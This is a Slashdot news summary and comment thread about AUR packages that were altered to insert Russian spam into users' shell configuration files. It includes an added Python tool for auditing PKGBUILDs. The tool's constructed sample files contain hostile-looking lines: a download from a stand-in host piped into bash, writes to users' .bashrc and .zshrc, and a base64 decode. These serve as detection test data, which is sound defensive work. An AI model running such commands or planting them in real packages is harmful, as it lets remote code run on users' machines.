Russian Spam and Profanities Are Now Plaguing the Arch Linux AUR (phoronix.com)
The Arch Linux User Repository "AUR" is facing another issue just days after more than 1,500 packages were found carrying malware. According to Phoronix, over 70 AUR packages have reportedly been modified to insert Russian spam and profane messages into users' shell configuration files. From the report: Nicolas Boichat with his AI/LLM detection bot detected some questionable messages appearing in AUR content. Russian messages were being added post-install to the bashrc / zshrc / Fish configuration, etc., containing offensive messaging. Those commits happened on the 14th, after the recent malware fiasco. And then over the past day there has been reporting on dozens of AUR packages having similar Russian messages containing offensive language.
The latest update on that thread indicates more than 70 AUR packages having this Russian spam / offensive messaging. Among those various Python packages, Ruby packages, Llama.cpp, and others. At least the AI/LLM bots are proving helpful here in proactively picking up on some of the AUR abuses until the fundamental situation can be better handled.
Re: (Score:2)
The beauty of the open source lie, that there are any eyeballs at all.
Yeah, we never discovered this problem, because there are no eyeballs at all.
If you can't learn to think, at least learn to read.
This is validating my decision to stay on Debian (Score:5, Interesting)
I run Linux as a desktop and have done so since around 2008. I started with Ubuntu, and after a while (probably around 5-10 years) I moved to Debian. Every once in a while, I'll read about one of the new Arch-based distros (Manjaro, Calyx OS) and decide to give it a try. After a few hours, I realize that some of the programs I use on a regular basis are not available (easily) outside of the AUR. When you read about the AUR as an intermediate user, you understand how dangerous it can be, but you feel like it's necessary to use Linux as your main computing device. There are applications that are packaged as DEB/RPM but not for Arch, and are not available as Flatpaks (or AppImages or Snaps). Some of these are proprietary.
One in particular which comes to mind is Insync, which I use to synchronize Google shared folders to my home directory. It is much easier to use than rclone and the latency is a lot lower. If I move to an Arch-based system, I have to get that from the AUR. Now, I do feel like I have the experience to read the PKGBUILD and audit it for weird stuff going on, but I'm also not arrogant enough to believe that someone could not sneak something by me.
I use Debian Stable, and all of my software is available. Some of the software is dated, obviously; I'm running KDE 6.3.6 and kernel 6.12. But in general, I don't have huge issues with that, and if there was an application I needed to update, I probably could do it either with Flatpaks or compiling from source. Honestly though, I cannot remember the last time I needed to do that. Maybe it helps that I'm not a professional software developer and I don't need access to the latest versions of everything. I also know that some Debian users address those issues by running testing or unstable.
There's a part of me that wonders if these attacks are related to the surge in popularity of Calyx OS. I teach high school, and I noticed last year that one of my ninth graders was running KDE on his laptop. I asked him what distro he was running, and he said Calyx OS. I was surprised by that - most of the time when I run into a high school kid they're running something in the Debian family (including Ubuntu and its derivatives).
Re: (Score:3)
I'm also a Debian fan, but I'm not sure this Arch issue validates anything for Debian. How is their supply chain different/improved/more-secure? Please note, I simply don't know. If someone could confirm this is far less likely on Debian because yada yada yada.., that'd be great.
Re: (Score:3, Insightful)
Re: (Score:2)
Thanks! I overlooked the user repo part.
Re: (Score:2)
And that is a problem. You can't run Debian on new hardware.
Why did I go Arch? I had a new laptop. I couldn't even boot Ubuntu or Debian installers. Nothing would boot on that thing because it was too new. I wasn't waiting another year for the LTS cycles to refresh.
That's the other problem with Linux. If you use the standard model....you're SOL on new hardware. Especially if it's a full platform refresh like Dell's were last year.
Re: (Score:3)
We generally trust packages produced by distro developers, whether it's Arch, Debian or others. A distro packager could be a mole, but it's easy for them to get caught. What we don't trust are user repositories, where anons like you and me can publish a binary. Assuming the Debian developers are trustworthy, you can trust Debian. If you take your Debian and add PPA (custom repositories, originally developed for Ubuntu) then you're susceptible to malware added by the PPA publisher.
Personally I use Gentoo. As
Re: (Score:2)
What we don't trust are user repositories, where anons like you and me can publish a binary.
Great point supporting the wrong argument. AUR does NOT host binaries - there is NO WAY for anon to make a binary available directly to Arch users. Let's all get this clear.
What is the AUR?
The AUR (Arch User Repository) is a community-driven repository of build scripts called PKGBUILDs. It doesn't host packages themselves — it hosts recipes that tell your system how to fetch sources and compile/package software locally.
What it hosts: PKGBUILDs for software not in the official repos — proprieta
Re: This is validating my decision to stay on Debi (Score:2)
Thanks. I just made a similar point below.
If you don't know how to review a PKGBUILD file, then perhaps AUR is not for you.
Re: (Score:2)
Thanks for correcting my wrong information.
Re: (Score:1)
it's almost impossible to imagine that a compromised build script would just pick up votes and make it to a repo.
The Russian trolls could certainly band together and upvote their malware-ridden AUR packages. The obfuscated C contest shows again and again that the assumption that bad code would be obvious is rather unrealistic, for example in cable2 [github.com], or the xz utils backdoor [wikipedia.org].
Re: (Score:2)
Excellent information - thank you!
So in summary AUR is exactly like your Gentoo compile scripts.
There seems to be one glaring difference:
* AUR PKGBUILDs are apparently community driven with no vetting besides community votes.
* Gentoo ebuilds are maintained by official Gentoo developers - devs taking ownership of specific packages or official working groups on core components and complex stuff. Community provided ebuilds and updates get run through an official dev.
HOWEVER, Gentoo has community overlays, like Project:GURU. These seem to be exactly like AUR PKGBUILDs.
In
Re:This is validating my decision to stay on Debia (Score:5, Informative)
Each category (or group) of packages generally has a team of people who work together to commit changes to Unstable, aided by senior developers who have non-maintainer upload rights to dip in and help out if packages end up lacking named maintainers. There's no concept of a random person with no history of contributing immediately taking over orphaned packages, and while a package maintainer owns the responsibility of making sure changes work, folks definitely aren't alone when it comes to QA/QC.
Debian also splits out everything so that any potentially reusable dynamic libraries can be re-used by as many other packages as possible. If there's a new dependent library being introduced which no other package already makes use of, it needs to be added to the Debian archive as a brand new package, where the process is ultimately overseen by a separate team of people. Even if all that scrutiny doesn't pick up on something, Canonical engineers also use Debian's packages as the basis for Universe/Multiverse in Ubuntu and have to perform their own checks before syncing over new packages in from Debian Unstable when MOTU ("Masters Of The Universe" aka. community contributors mentored by Canonical) put in a request as part of maintaining the packages they look after.
The end result is potentially even better scrutinised than the packaging approach typical macOS and Windows apps receive, due to the number of separate individual maintainers taking responsibility for dependent libraries, as opposed to an independent or small team of developers taking responsibility for everything. However, it does also mean if one common library gets subverted in some way, especially by a compromise of the upstream project (as people saw with the xz backdoor attempt) then the net impact could be far wider than with vendored libraries (how packages work with macOS/Windows) where developers can choose to stick with older versions for their application for longer. Of course, that's somewhat mitigated by that thing I'm ignoring called Debian Stable... =]
Note: I'm not a Debian Developer (just someone who ends up reading way too much) so it's possible some of what I'm saying isn't as accurate as it could be, but I hope this gives you a general gist of the differences.
Re: (Score:2)
Thank you! This goes even further than the above comments :-)
Re: (Score:2)
Re: (Score:1)
Re: This is validating my decision to stay on Debi (Score:3)
It's only dangerous if you don't know how to handle it.
AUR itself doesn't host any binaries. It provides build scripts called PKGBUILDs. They, in turn point at source repositories where the binaries come from.
The official guidance is that you should review the PKGBUILD file before compiling/making your package. This involves checking the sources referenced in the file as well as the contents of the build script itself.
If you don't know how to review a PKGBUILD file, then perhaps AUR is not for you.
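The review step described above (check the sources a PKGBUILD references and read the build script itself) can be partly mechanised. The following is an added example written for this page, not code from the AUR project or from any commenter: a small Python auditor that flags the patterns relevant to this incident, namely lines in a PKGBUILD or .install file that append to shell startup files (.bashrc, .zshrc, fish's config.fish), downloads piped straight into a shell, base64-decoded payloads, plain-http source URLs and SKIPped checksums. The sample PKGBUILD and .install texts are constructed for the example (example.invalid is not a real host); the heuristics are a starting point for a human review, not a substitute for it.

```python
import re

# Heuristics a reviewer applies before running makepkg. These patterns are
# constructed for this example; they are a starting point, not a complete list.
RC_FILE = re.compile(r'\.(bashrc|zshrc|profile|bash_profile|zprofile)\b'
                     r'|config\.fish|/etc/profile\.d/')
MODIFIER = re.compile(r'>>|\btee\b|\bsed\s+-i|\bcat\s*>|\bcp\b|\bmv\b')
PIPE_TO_SHELL = re.compile(r'\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z|da)?sh\b')
B64_DECODE = re.compile(r'\bbase64\s+(-d|--decode)\b')
ARRAY = r'{name}=\((.*?)\)'


def _array(text, name):
    """Return the entries of a bash array such as source=(...) as a list."""
    m = re.search(ARRAY.format(name=name), text, re.S)
    if not m:
        return []
    return [tok.strip('\'"') for tok in m.group(1).split()]


def audit_pkgbuild(text):
    """Scan PKGBUILD or .install text; return (line_no, category, detail) findings.

    line_no is 0 for findings derived from whole arrays (source=, *sums=)."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith('#'):
            continue
        if RC_FILE.search(line) and MODIFIER.search(line):
            findings.append((n, 'modifies shell startup file', line))
        if PIPE_TO_SHELL.search(line):
            findings.append((n, 'pipes downloaded content into a shell', line))
        if B64_DECODE.search(line):
            findings.append((n, 'decodes a base64 payload', line))
    for src in _array(text, 'source'):
        url = src.split('::', 1)[-1]  # strip the optional "filename::" prefix
        if url.startswith('http://'):
            findings.append((0, 'source fetched without TLS', url))
    for name in ('md5sums', 'sha1sums', 'sha256sums', 'sha512sums', 'b2sums'):
        if 'SKIP' in _array(text, name):
            findings.append((0, 'checksum verification skipped (%s)' % name, 'SKIP'))
    return findings


# Constructed sample PKGBUILD exhibiting the patterns above (not a real package).
SAMPLE_PKGBUILD = """\
# Maintainer: example (constructed sample, not a real AUR package)
pkgname=example-tool
pkgver=1.2.3
pkgrel=1
arch=('x86_64')
source=("https://example.invalid/example-tool-$pkgver.tar.gz"
        "http://example.invalid/helper.sh")
sha256sums=('SKIP'
            'SKIP')

build() {
  cd "$srcdir/$pkgname-$pkgver"
  make
}

package() {
  cd "$srcdir/$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
  echo 'echo "hello from the package"' >> ~/.bashrc
  curl -s http://example.invalid/extra.sh | bash
}
"""

# Constructed sample .install file: post_install hooks run as root on the
# user's machine, so they deserve the same scrutiny as the PKGBUILD.
SAMPLE_INSTALL = """\
post_install() {
  printf '%s\\n' 'some message' >> /home/*/.zshrc
  echo aGVsbG8K | base64 -d
}
"""


if __name__ == '__main__':
    for label, text in (('PKGBUILD', SAMPLE_PKGBUILD), ('.install', SAMPLE_INSTALL)):
        print('==', label)
        for line_no, category, detail in audit_pkgbuild(text):
            print('%4s  %-45s %s' % (line_no or '-', category, detail))
```

Run it against the PKGBUILD and any .install file fetched for a package before makepkg; an empty finding list means only that none of these specific patterns matched, so the script and its source URLs still get read by a person.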
Re: (Score:2)
Look guy.....Debian isn't any safer from this.
Here's the thing...as everyone pointed out...it's AUR. User repositories. Now...Arch does have a more centralized system...which is good; but Debian isn't immune because you STILL have third-party repositories. Those third-party repositories still have the same failure points. Maybe AUR is a little easier...anyone can adopt an orphaned repository; but one might notice a dead repo coming back to life and look at it with caution.
This exact same thing could happen
And this is not new (Score:2)
We used to call them griefers. Now they pretend to have meaning.
Stay away from mah Gentoo (Score:2)
Re: (Score:2)
Odd. My first suspect was either Ukrainians or some of their sympathizers.
Re: (Score:2)
What possible motive would Ukraine have to fuck with a poorly maintained linux distribution?
Re: (Score:2)
The motive would be to insult the Russians.
Re: (Score:2)
Do you seriously think you're fooling anyone?
Snowden (Score:3)
Re: (Score:1)
Blyatiful! (Score:2)
I told them that Katyusha, my Russian Blue cat couldn't be trusted with commit rights.
I guess they had to find out the hard way.
Sad Days For Arch (Score:2, Informative)
This will severely damage Arch, possibly beyond repair.
It will be sad to see Arch go. I've personally never used it. But, I have and do use their documentation. Arch docs are fantastic, no matter what distro you use.
Arch will be fine (Score:3)
AUR is not an official repository for Arch distributions. It requires extra tooling; you can't install from the AUR in pacman, and AUR has historically been a risk for breakages with the official updates. It's always been a known risk, and in the age of AI malware, it will have to be adapted or removed.
There's nothing wrong with the actively maintained Arch distributions. These are the same pains every distribution has to deal with presently.
Re: (Score:1)
These are the same pains every distribution has to deal with presently.
No one outside the Arch (and its derivatives) community is dealing with any external pains at the moment.
Re: (Score:3)
The 'pain' here is that Arch wanted to provide a way for users to manage 'ad hoc' packages within the pacman system and make them available to other users if necessary. For reference I can find examples of only 4 other linux distros that support an equivalent:
Re: (Score:1)
The 'pain' here is that Arch wanted to provide a way for users to manage 'ad hoc' packages within the pacman system and make them available to other users if necessary.
Because Arch's entire design philosophy, and how they go about it, is stupid.
I can find examples of only 4 other linux distros that support an equivalent
And these aren't having any issues. I don't know much about Nix other than it is an immutable distro, probably harder to target. The rest, barely anyone uses. Gentoo, Slackware, and CRUX all have extremely low user counts. Arch and Nix are the only two of these five that are still actually growing, the rest either are holding on or dying. So they aren't good targets.
but I think it's idiotic to paint Arch as a whole in a negative light for a niche user contribution add-on that is totally separate to their official package line
AUR is just one reason to paint Arch in a negative light. Thei
Re: (Score:2)
Their entire approach and mindset leaves users vulnerable.
Genuinely interested to know more about why you think that. I've used Arch for about 20 years so I'm probably unconsciously a fanboi, but pacman is the approach to package management that I've hated least of all I've tried, so I stayed there.
Re: (Score:2)
Nothing against pacman. I even occasionally use an Arch Distrobox to use pacman. Arch does not support SELinux but it does support AppArmor and TOMOYO. However, due to their entire philosophy they neither include any security frameworks nor does their install script/guides mention or suggest using them. At the barest of minimums they should be recommending that users install and configure a security framework - especially in today's age. If users don't want it, fine. But it should be that the user has to sa
Re: (Score:2)
Just what about the design philosophy is stupid? Is it any dumber than what other distros have done?
Look at Ubuntu? How fucking bloated is that installer. What the fuck is cloud-init? I'm running one physical machine and the fucking thing insists it needs cloud-init and all sorts of other cloud bullshit. Not to mention...what the fuck is the point of having 3 or 4 gigs worth of ISO if the installer won't fucking use it. You can't even install Ubuntu without network. It's not grabbing updates...it's grabbing
Re: (Score:2)
Just what about the design philosophy is stupid?
The DIY mindset is stupid.
The lax attitude towards system security is stupid.
The maintenance and micromanagement required of Arch is stupid.
Is it any dumber than what other distros have done?
Yes.
Look at Ubuntu
Ubuntu is also trash. I'd say even worse than Arch, but it is easier to use for newbies comparatively. Debian, not great. Mint, absolute trash.
one of the few rolling distributions that actually stays halfway updated and not 2 years behind like everything else
Plenty of distros that stay up-to-date with any upstream updates.
I mean maybe you need to go back and look at what this OS was...back before package managers.
No. I don't. What the OS was before package managers is completely irrelevant to anything.
I prefer the Red Hat/Fedora family of Linux, but I also like, in gener
Re: (Score:1)
Yes...I love having a kernel that's 2 years old and won't boot on modern hardware.
Please tell me how Debian and Ubuntu are so superior. Why...they actually started running on my Dell only a year after I actually acquired that. Wow...if it's such the better designed OS then I guess other distros might fall in line....
except Arch booted and ran on that thing day 1 because it's not a whiny little bitch.
If Arch is so stupid why was it the only thing that ran? If the design philosophy is so bad...why does the alm
Re: Sad Days For Arch (Score:2)
Arch is not going anywhere, mate.
Re: (Score:2)
It's the end of open source.
This is going to be proof to more companies as to why they need to go back to closed. It will be a keypoint in why open source development needs to end.
This isn't just the death of Arch...it's the opening act of the death of Linux. Because corporate interests are rapidly leaving. I'm seeing more projects get discontinued in favor of closed source.
None of us are going to have any choices in a few years. There won't be open source. There won't be community development.
Build Script? (Score:2)
Isn't AUR showing you the build script, before it executes it? You certainly read what shell script from some unknown user you're running, didn't you?
This is utterly unsurprising. (Score:2)
Russia always was our Arch enemy.
Archlinux is just tech dimwits and hackx0r mimics (Score:1)
Re: (Score:2)
I bet you can't run Linux unless it's Ubuntu because you're a n00b.
Something like...? - (Score:2)
"Кстати, я не пользуюсь Arch." ("By the way, I don't use Arch.")
BTW, I use (Score:2)
Cyka blyat (Score:1)
1. Blindly trust an unofficial repo ...
2. Get very mild malware
3.
4. BITCH ABOUT IT!!